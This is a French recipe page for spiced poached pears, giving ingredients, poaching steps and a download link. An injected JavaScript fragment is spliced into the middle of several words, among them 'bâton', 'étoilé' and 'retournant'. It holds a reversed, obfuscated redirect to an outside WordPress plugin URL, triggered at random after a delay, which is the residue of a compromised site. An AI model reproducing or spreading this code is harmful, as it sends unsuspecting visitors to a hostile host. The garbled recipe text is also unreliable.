POIRES POCHÉES AUX ÉPICES

POIRES POCHÉES AUX ÉPICES

Pour 4 Pers.

INGRÉDIENTS :

– 4 poires mûres mais fermes
– 750ml d’eau
– 80g de sucre en poudre
– 40g de miel
– 1 bâtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton de cannelle
– 5 badiane (anis étoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toilé)
– 5 gousse de cardamone
– 1cc d’extrait de vanille
– Le jus d’un citron

Verser l’eau avec le sucre et les épices dans une petite casserole.


Porter à ébullition puis baisser le feu au minimum


Eplucher les poires en laissant la queue. Les évider par le fond avec un couteau pointu.


Les citronner au fur et à mesure pour ne pas qu’elles noircissent


Dès que le sirop aux épices bout, y plonger les poires et faire cuire pendant environ quarante minutes à frémissement, en les retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tournant de temps en temps, très délicatement.


Laisser refroidir les poires dans le sirop puis réserver au frais jusqu’au moment de servir


Dresser les poires dans des assiettes, arroser avec le sirop et décorer avec les épices.

MENU-BE-HARMONY-NOEL-20203toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton” download>Télécharger

Leave comments

Your email is safe with us.

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.